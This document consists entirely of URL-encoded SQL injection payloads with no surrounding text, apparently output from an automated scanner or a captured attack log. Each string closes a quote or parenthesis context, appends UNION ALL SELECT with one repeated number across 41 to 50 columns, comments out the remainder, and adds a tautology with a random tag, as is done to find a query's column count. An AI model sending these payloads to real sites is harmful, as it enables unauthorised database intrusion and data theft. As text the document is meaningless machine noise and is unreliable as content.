-7929%27%29%29%29%20UNION%20ALL%20SELECT%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697--%20%20AND%20%28%28%28%27xYkz%27%20LIKE%20%27xYkz -1276%27%29%29%29%20UNION%20ALL%20SELECT%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859%2C%204859--%20%20AND%20%28%28%28%27jVdl%27%20LIKE%20%27jVdl -9011%27%29%29%29%20UNION%20ALL%20SELECT%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350%2C%205350--%20%20AND%20%28%28%28%27ASGB%27%20LIKE%20%27ASGB -3513%27%29%29%29%20UNION%20ALL%20SELECT%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843%2C%209843--%20%20AND%20%28%28%28%27TRjU%27%20LIKE%20%27TRjU -8001%27%29%29%29%20UNION%20ALL%20SELECT%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146%2C%207146--%20%20AND%20%28%28%28%27UIpc%27%20LIKE%20%27UIpc -7937%27%29%29%29%20UNION%20ALL%20SELECT%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671%2C%208671--%20%20AND%20%28%28%28%27xeqg%27%20LIKE%20%27xeqg -5655%27%29%29%29%20UNION%20ALL%20SELECT%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033%2C%201033--%20%20AND%20%28%28%28%27GQLN%27%20LIKE%20%27GQLN -6368%27%29%29%29%20UNION%20ALL%20SELECT%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159%2C%203159--%20%20AND%20%28%28%28%27kQiO%27%20LIKE%20%27kQiO -5408%27%29%29%29%20UNION%20ALL%20SELECT%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867%2C%207867--%20%20AND%20%28%28%28%27YxZu%27%20LIKE%20%27YxZu -1986%27%29%29%29%20UNION%20ALL%20SELECT%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727%2C%204727--%20%20AND%20%28%28%28%27zfgt%27%20LIKE%20%27zfgt -1514%27%20UNION%20ALL%20SELECT%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983%2C%204983--%20%20AND%20%27zJzO%27%20LIKE%20%27zJzO -9203%27%20UNION%20ALL%20SELECT%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832%2C%206832--%20%20AND%20%27lcTI%27%20LIKE%20%27lcTI -5363%27%20UNION%20ALL%20SELECT%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709%2C%203709--%20%20AND%20%27mAov%27%20LIKE%20%27mAov -7811%27%20UNION%20ALL%20SELECT%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814--%20%20AND%20%27SFcQ%27%20LIKE%20%27SFcQ -7396%27%20UNION%20ALL%20SELECT%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243%2C%203243--%20%20AND%20%27meeb%27%20LIKE%20%27meeb -9508%27%20UNION%20ALL%20SELECT%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076%2C%201076--%20%20AND%20%27Brgx%27%20LIKE%20%27Brgx -7288%27%20UNION%20ALL%20SELECT%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287%2C%206287--%20%20AND%20%27ijAq%27%20LIKE%20%27ijAq -7948%27%20UNION%20ALL%20SELECT%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704%2C%207704--%20%20AND%20%27hiQq%27%20LIKE%20%27hiQq -8842%27%20UNION%20ALL%20SELECT%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895%2C%205895--%20%20AND%20%27Bebk%27%20LIKE%20%27Bebk -6128%27%20UNION%20ALL%20SELECT%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758%2C%205758--%20%20AND%20%27CsmZ%27%20LIKE%20%27CsmZ -9707%22%29%20UNION%20ALL%20SELECT%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174%2C%204174--%20%20AND%20%28%22dWYo%22%3D%22dWYo -9678%22%29%20UNION%20ALL%20SELECT%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732--%20%20AND%20%28%22argX%22%3D%22argX -4142%22%29%20UNION%20ALL%20SELECT%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489%2C%209489--%20%20AND%20%28%22lZem%22%3D%22lZem -3160%22%29%20UNION%20ALL%20SELECT%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302%2C%209302--%20%20AND%20%28%22izRu%22%3D%22izRu -2649%22%29%20UNION%20ALL%20SELECT%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084%2C%206084--%20%20AND%20%28%22zOHa%22%3D%22zOHa -4401%22%29%20UNION%20ALL%20SELECT%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256%2C%206256--%20%20AND%20%28%22MFGt%22%3D%22MFGt -7457%22%29%20UNION%20ALL%20SELECT%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723%2C%208723--%20%20AND%20%28%22YOSH%22%3D%22YOSH -8678%22%29%20UNION%20ALL%20SELECT%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411%2C%206411--%20%20AND%20%28%22dyUJ%22%3D%22dyUJ -6543%22%29%20UNION%20ALL%20SELECT%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836%2C%209836--%20%20AND%20%28%22KfBS%22%3D%22KfBS -2251%22%29%20UNION%20ALL%20SELECT%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090%2C%202090--%20%20AND%20%28%22inPZ%22%3D%22inPZ -1705%22%29%29%20UNION%20ALL%20SELECT%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347%2C%206347--%20%20AND%20%28%28%22uDAV%22%3D%22uDAV -3030%22%29%29%20UNION%20ALL%20SELECT%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209%2C%204209--%20%20AND%20%28%28%22DybK%22%3D%22DybK -6458%22%29%29%20UNION%20ALL%20SELECT%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198%2C%209198--%20%20AND%20%28%28%22fwsl%22%3D%22fwsl -5424%22%29%29%20UNION%20ALL%20SELECT%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527%2C%203527--%20%20AND%20%28%28%22JHDb%22%3D%22JHDb -7564%22%29%29%20UNION%20ALL%20SELECT%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697%2C%201697--%20%20AND%20%28%28%22oSUk%22%3D%22oSUk -3077%22%29%29%20UNION%20ALL%20SELECT%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920%2C%205920--%20%20AND%20%28%28%22xOZk%22%3D%22xOZk -2897%22%29%29%20UNION%20ALL%20SELECT%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904%2C%202904--%20%20AND%20%28%28%22fgxV%22%3D%22fgxV -6417%22%29%29%20UNION%20ALL%20SELECT%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704--%20%20AND%20%28%28%22DsHR%22%3D%22DsHR -7795%22%29%29%20UNION%20ALL%20SELECT%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280%2C%203280--%20%20AND%20%28%28%22gAfa%22%3D%22gAfa -9295%22%29%29%20UNION%20ALL%20SELECT%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028%2C%204028--%20%20AND%20%28%28%22qFJd%22%3D%22qFJd -3606%22%29%29%29%20UNION%20ALL%20SELECT%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072%2C%202072--%20%20AND%20%28%28%28%22DDMS%22%3D%22DDMS -9348%22%29%29%29%20UNION%20ALL%20SELECT%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131%2C%205131--%20%20AND%20%28%28%28%22qWgJ%22%3D%22qWgJ -2110%22%29%29%29%20UNION%20ALL%20SELECT%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025%2C%207025--%20%20AND%20%28%28%28%22dXxH%22%3D%22dXxH -1143%22%29%29%29%20UNION%20ALL%20SELECT%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141%2C%209141--%20%20AND%20%28%28%28%22joon%22%3D%22joon -4616%22%29%29%29%20UNION%20ALL%20SELECT%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783%2C%206783--%20%20AND%20%28%28%28%22qkMi%22%3D%22qkMi -2582%22%29%29%29%20UNION%20ALL%20SELECT%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810%2C%205810--%20%20AND%20%28%28%28%22pUQO%22%3D%22pUQO 